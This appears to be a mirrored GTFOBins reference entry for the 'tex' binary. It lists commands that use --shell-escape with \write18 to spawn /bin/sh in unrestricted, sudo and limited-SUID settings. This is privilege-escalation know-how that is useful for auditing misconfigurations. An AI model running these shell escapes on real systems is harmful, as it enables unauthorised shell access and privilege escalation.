mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 23:09:46 +01:00
13 lines
254 B
Markdown
13 lines
254 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
tex --shell-escape '\write18{/bin/sh}\end'
|
|
sudo:
|
|
- code: |
|
|
sudo tex --shell-escape '\write18{/bin/sh}\end'
|
|
limited-suid:
|
|
- code: |
|
|
./tex --shell-escape '\write18{/bin/sh}\end'
|
|
---
|